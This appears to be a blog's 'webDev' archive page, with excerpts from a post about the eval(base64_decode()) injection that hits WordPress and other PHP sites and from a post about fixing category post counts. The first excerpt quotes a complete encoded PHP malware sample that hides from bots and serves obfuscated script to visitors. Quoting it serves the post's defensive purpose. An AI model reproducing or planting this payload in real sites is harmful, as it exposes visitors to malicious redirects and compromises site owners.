webDev

<?php eval(base64_decode(‘Your day just sucks’)); ?>

I have quite a few friends who are WordPress aficionados and have a very limited understanding of all of the ins and outs of how the CMS works. As a result they add functionality via plugins, make the site look the way want with a theme and then they put their sites on shared hosting. Easy, inexpensive and …potentially dangerous.

WordPress is probably the most widely used CMS among the not-so-tech-savvy web community and as a result is susceptible to attack. The most popular of these attacks (right now) looks a bit like

&lt;?php eval(base64_decode('ZXJyb3JfcmVwb3J0aW5nKDApOw0KJGJvdCA9IEZBTFNFIDsNCiR1YSA9ICRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXTsNCiRib3RzVUEgPSBhcnJheSgnMTIzNDUnLCdhbGV4YS5jb20nLCdhbm9ueW1vdXNlLm9yZycsJ2JkYnJhbmRwcm90ZWN0LmNvbScsJ2Jsb2dwdWxzZS5jb20nLCdib3QnLCdidXp6dHJhY2tlci5jb20nLCdjcmF3bCcsJ2RvY29tbycsJ2RydXBhbC5vcmcnLCdmZWVkdG9vbHMnLCdodG1sZG9jJywnaHR0cGNsaWVudCcsJ2ludGVybmV0c2Vlci5jb20nLCdsaW51eCcsJ21hY2ludG9zaCcsJ21hYyBvcycsJ21hZ2VudCcsJ21haWwucnUnLCdteWJsb2dsb2cgYXBpJywnbmV0Y3JhZnQnLCdvcGVuYWNvb24uZGUnLCdvcGVyYSBtaW5pJywnb3BlcmEgbW9iaScsJ3BsYXlzdGF0aW9uJywncG9zdHJhbmsuY29tJywncHNwJywncnJycnJycnJyJywncnNzcmVhZGVyJywnc2x1cnAnLCdzbm9vcHknLCdzcGlkZXInLCdzcHlkZXInLCdzem4taW1hZ2UtcmVzaXplcicsJ3ZhbGlkYXRvcicsJ3ZpcnVzJywndmxjIG1lZGlhIHBsYXllcicsJ3dlYmNvbGxhZ2UnLCd3b3JkcHJlc3MnLCd4MTEnLCd5YW5kZXgnLCdpcGhvbmUnLCdhbmRyb2lkJywnY2hyb21lJyk7DQpmb3JlYWNoICgkYm90c1VBIGFzICRicykge2lmKHN0cnBvcyhzdHJ0b2xvd2VyKCR1YSksICRicykhPT0gZmFsc2UpeyRib3QgPSB0cnVlOyBicmVhazt9fQ0KaWYgKCEkYm90KXsNCgllY2hvKGJhc2U2NF9kZWNvZGUoJ1BITmpjbWx3ZEQ1MGNubDdjVDFrYjJOMWJXVnVkQzVqY21WaGRHVkZiR1Z0Wlc1MEtDSmthWFlpS1R0eExtRndjR1Z1WkVOb2FXeGtLSEVySWlJcE8zMWpZWFJqYUNoeGR5bDdhRDB0TURFeUx6VTdmWFJ5ZVh0d2NtOTBiM1I1Y0dVN2ZXTmhkR05vS0dKeVpXSnlLWHR6ZEQxVGRISnBibWM3ZW5vOUoyRnNKenQ2ZWowbmVuWW5Mbk4xWW5OMGNpZ3hNak10TVRJeUtTdDZlanR6Y3oxYlhUdG1QU2RtY2ljckoyOXRKeXNuUTJnbk8yWXJQU2RoY2tNbk8yWXJQU2R4WjI5a1pTZGJJbk4xWW5OMGNpSmRLRFF0TWlrN2R6MTBhR2x6TzJVOWQxdG1XeUp6ZFdKemRISWlYU2d4TVNrcmVucGRPMjQ5SWpNdU5TTXpMalVqTlRFdU5TTTFNQ014TlNNeE9TTTBPU00xTkM0MUl6UTRMalVqTlRjdU5TTTFNeTQxSXpRNUxqVWpOVFFqTlRjak1qSWpOVEF1TlNNME9TNDFJelUzSXpNekxqVWpOVE1qTkRrdU5TTTFNeTQxSXpRNUxqVWpOVFFqTlRjak5UWXVOU016TWlNMU9TNDFJelF4SXpRM0xqVWpOVEF1TlNNek9DTTBOeTQxSXpVekxqVWpORGt1TlNNeE9TTXhPQzQxSXpRNEl6VTBMalVqTkRrak5Ua3VOU014T0M0MUl6RTVMalVqTkRRdU5TTXlNeU0wTlM0MUl6RTVMalVqTmpBdU5TTTFMalVqTXk0MUl6TXVOU016TGpVak5URXVOU00xTUNNMU5pTTBOeTQxSXpVekxqVWpORGt1TlNNMU5pTXhPU014T1M0MUl6STRMalVqTlM0MUl6TXVOU016TGpVak5qRXVOU014TlNNME9TNDFJelV6SXpVMkxqVWpORGt1TlNNeE5TTTJNQzQxSXpVdU5TTXpMalVqTXk0MUl6TXVOU00wT1NNMU5DNDFJelE0TGpVak5UY3VOU00xTXk0MUl6UTVMalVqTlRRak5UY2pNaklqTlRndU5TTTFOaU0xTVM0MUl6VTNJelE1TGpVak1Ua2pNVFlqTWprak5URXVOU00xTUNNMU5pTTBOeTQxSXpVekxqVWpORGt1TlNNeE5TTTFOaTQxSXpVMkl6UTRMalVqTWprdU5TTXhPQzQxSXpVeEl6VTNJelUzSXpVMUl6STRJekl5TGpVak1qSXVOU00xTkM0MUl6UTRMalVqTkRjdU5TTTFOU00xT1M0MUl6UTNMalVqTlRJak1qSWpOVEV1TlNNME9DTTFNUzQxSXpZd0l6SXlJelE0TGpVak5EZ3VOU015TWk0MUl6TXdMalVqTlRBdU5TTTFOQzQxSXpJNUxqVWpNalFqTVRndU5TTXhOU00xT0M0MUl6VXhMalVqTkRrak5UY2pOVEVqTWprdU5TTXhPQzQxSXpJekxqVWpNak1qTVRndU5TTXhOU00xTVNNME9TNDFJelV4TGpVak5UQXVOU00xTVNNMU55TXlPUzQxSXpFNExqVWpNak11TlNNeU15TXhPQzQxSXpFMUl6VTJMalVqTlRjak5Ua3VOU00xTXlNME9TNDFJekk1TGpVak1UZ3VOU00xT0NNMU1TNDFJelUyTGpVak5URXVOU00wT0NNMU1TNDFJelV6SXpVeExqVWpOVGNqTlRrdU5TTXlPQ00xTVNNMU1TNDFJelE1SXpRNUl6UTVMalVqTlRRak1qZ3VOU00xTlNNMU5DNDFJelUyTGpVak5URXVOU00xTnlNMU1TNDFJelUwTGpVak5UUWpNamdqTkRjdU5TTTBPQ00xTmk0MUl6VTBMalVqTlRNak5UY3VOU00xTnlNME9TNDFJekk0TGpVak5UTWpORGt1TlNNMU1DTTFOeU15T0NNeU15TXlPQzQxSXpVM0l6VTBMalVqTlRVak1qZ2pNak1qTWpndU5TTXhPQzQxSXpNd0l6STVJekl5TGpVak5URXVOU00xTUNNMU5pTTBOeTQxSXpVekxqVWpORGt1TlNNek1DTXhOaU14T1M0MUl6STRMalVqTlM0MUl6TXVOU016TGpVak5qRXVOU00xTGpVak15NDFJek11TlNNMU1DTTFOeTQxSXpVMEl6UTRMalVqTlRjak5URXVOU00xTkM0MUl6VTBJekUxSXpVeExqVWpOVEFqTlRZak5EY3VOU00xTXk0MUl6UTVMalVqTlRZak1Ua2pNVGt1TlNNMk1DNDFJelV1TlNNekxqVWpNeTQxSXpNdU5TTTFPQ00wTnk0MUl6VTJJekUxSXpVd0l6RTFJekk1TGpVak1UVWpORGtqTlRRdU5TTTBPQzQxSXpVM0xqVWpOVE11TlNNME9TNDFJelUwSXpVM0l6SXlJelE0TGpVak5UWWpORGt1TlNNME55NDFJelUzSXpRNUxqVWpNek11TlNNMU15TTBPUzQxSXpVekxqVWpORGt1TlNNMU5DTTFOeU14T1NNeE9DNDFJelV4TGpVak5UQWpOVFlqTkRjdU5TTTFNeTQxSXpRNUxqVWpNVGd1TlNNeE9TNDFJekk0TGpVak5UQWpNaklqTlRZdU5TTTBPUzQxSXpVM0l6TXhMalVqTlRjak5UY2pOVFlqTlRFdU5TTTBPQ00xTnk0MUl6VTNJelE1TGpVak1Ua2pNVGd1TlNNMU5pNDFJelUySXpRNExqVWpNVGd1TlNNeU1TTXhPQzQxSXpVeEl6VTNJelUzSXpVMUl6STRJekl5TGpVak1qSXVOU00xTkM0MUl6UTRMalVqTkRjdU5TTTFOU00xT1M0MUl6UTNMalVqTlRJak1qSWpOVEV1TlNNME9DTTFNUzQxSXpZd0l6SXlJelE0TGpVak5EZ3VOU015TWk0MUl6TXdMalVqTlRBdU5TTTFOQzQxSXpJNUxqVWpNalFqTVRndU5TTXhPUzQxSXpJNExqVWpOVEFqTWpJak5UWXVOU00xTnlNMU9TNDFJelV6SXpRNUxqVWpNaklqTlRnak5URXVOU00xTmk0MUl6VXhMalVqTkRnak5URXVOU00xTXlNMU1TNDFJelUzSXpVNUxqVWpNamt1TlNNeE9DNDFJelV4SXpVeExqVWpORGtqTkRrak5Ea3VOU00xTkNNeE9DNDFJekk0TGpVak5UQWpNaklqTlRZdU5TTTFOeU0xT1M0MUl6VXpJelE1TGpVak1qSWpOVFVqTlRRdU5TTTFOaTQxSXpVeExqVWpOVGNqTlRFdU5TTTFOQzQxSXpVMEl6STVMalVqTVRndU5TTTBOeTQxSXpRNEl6VTJMalVqTlRRdU5TTTFNeU0xTnk0MUl6VTNJelE1TGpVak1UZ3VOU015T0M0MUl6VXdJekl5SXpVMkxqVWpOVGNqTlRrdU5TTTFNeU0wT1M0MUl6SXlJelV6SXpRNUxqVWpOVEFqTlRjak1qa3VOU014T0M0MUl6SXpJekU0TGpVak1qZ3VOU00xTUNNeU1pTTFOaTQxSXpVM0l6VTVMalVqTlRNak5Ea3VOU015TWlNMU55TTFOQzQxSXpVMUl6STVMalVqTVRndU5TTXlNeU14T0M0MUl6STRMalVqTlRBak1qSWpOVFl1TlNNME9TNDFJelUzSXpNeExqVWpOVGNqTlRjak5UWWpOVEV1TlNNME9DTTFOeTQxSXpVM0l6UTVMalVqTVRrak1UZ3VOU00xT0M0MUl6VXhMalVqTkRrak5UY2pOVEVqTVRndU5TTXlNU014T0M0MUl6SXpMalVqTWpNak1UZ3VOU014T1M0MUl6STRMalVqTlRBak1qSWpOVFl1TlNNME9TNDFJelUzSXpNeExqVWpOVGNqTlRjak5UWWpOVEV1TlNNME9DTTFOeTQxSXpVM0l6UTVMalVqTVRrak1UZ3VOU00xTVNNME9TNDFJelV4TGpVak5UQXVOU00xTVNNMU55TXhPQzQxSXpJeEl6RTRMalVqTWpNdU5TTXlNeU14T0M0MUl6RTVMalVqTWpndU5TTTFMalVqTXk0MUl6TXVOU016TGpVak5Ea2pOVFF1TlNNME9DNDFJelUzTGpVak5UTXVOU00wT1M0MUl6VTBJelUzSXpJeUl6VXdMalVqTkRrdU5TTTFOeU16TXk0MUl6VXpJelE1TGpVak5UTXVOU00wT1M0MUl6VTBJelUzSXpVMkxqVWpNeklqTlRrdU5TTTBNU00wTnk0MUl6VXdMalVqTXpnak5EY3VOU00xTXk0MUl6UTVMalVqTVRrak1UZ3VOU00wT0NNMU5DNDFJelE1SXpVNUxqVWpNVGd1TlNNeE9TNDFJelEwTGpVak1qTWpORFV1TlNNeU1pTTBOeTQxSXpVMUl6VTFJelE1TGpVak5UUWpORGtqTXpJdU5TTTFNU00xTVM0MUl6VXpJelE1SXpFNUl6VXdJekU1TGpVak1qZ3VOU00xTGpVak15NDFJek11TlNNMk1TNDFJbHNvS0dVcFB5SnpJam9pSWlrckluQWlLeUpzYVhRaVhTZ2lZU01pV3lnb1pTay9Jbk4xSWpvaUlpa3JJbUp6ZEhJaVhTZ3hLU2s3Wm05eUtHazlOaTB5TFRFdE1pMHhPMmt0TlRZMUlUMHdPMmtyS3lsN2FqMXBPMmxtS0hOMEtYTnpQWE56SzNOMExtWnliMjFEYUdGeVEyOWtaU2d0TVNwb0tpZ3hLekVxYmx0cVhTa3BPMzF4UFhOek8yVW9jU2s3ZlR3dmMyTnlhWEIwUGc9PScpKTsNCn0='));?&gt;

though your gibberish may vary. There are two layers of protection for you and your users against this beast — prevention and response — and my guide will work on all PHP based sites, not just WordPress. I will say this now, I am not offering a 100 percent guarantee that this guide will keep you virus free but I am quite sure it will go a long way to protect your users from malicious sites and will make your cleanup much, much faster.
Continue reading →

The Problem

I was doing some work for a client’s e-commerce website this weekend and ran into some trouble engineering some of the sites cosmetic features. I am using WP E-Commerce (which is very good now that I have customized it and programmed out many of the bugs), which makes excellent use of WordPress’ custom post type capabilities.

I was working on a product category list, but I was adapting it to only display categories that only have items in it — empty categories would automatically hide. Well after testing it and then loading in 200+ products making mistakes and trashing different things along the way I noticed that my categories were not hiding when empty.

Taking a closer look I found that, even though WordPress was saying the category was empty, the post count in the database wasn’t 0. Baffled by the phenomenon I decided to do what every experience and competent developer like myself does — I googled the problem. One recommendation was ‘empty the trash.’ I felt like such a dunce. I went in and emptied the trash, and voila! the problem remained. Darn it! So I came up with a PHP based solution that fixes the problem. As usual, my solution explained with code is below.
Continue reading →

Category Archives: webDev

The dreaded eval(base64_decode()) — How to protect your site and your visitors

Fixing Incorrect Category Post Counts

Automating a cPanel backup

Caching with PHP

Facebook meta tagging in WordPress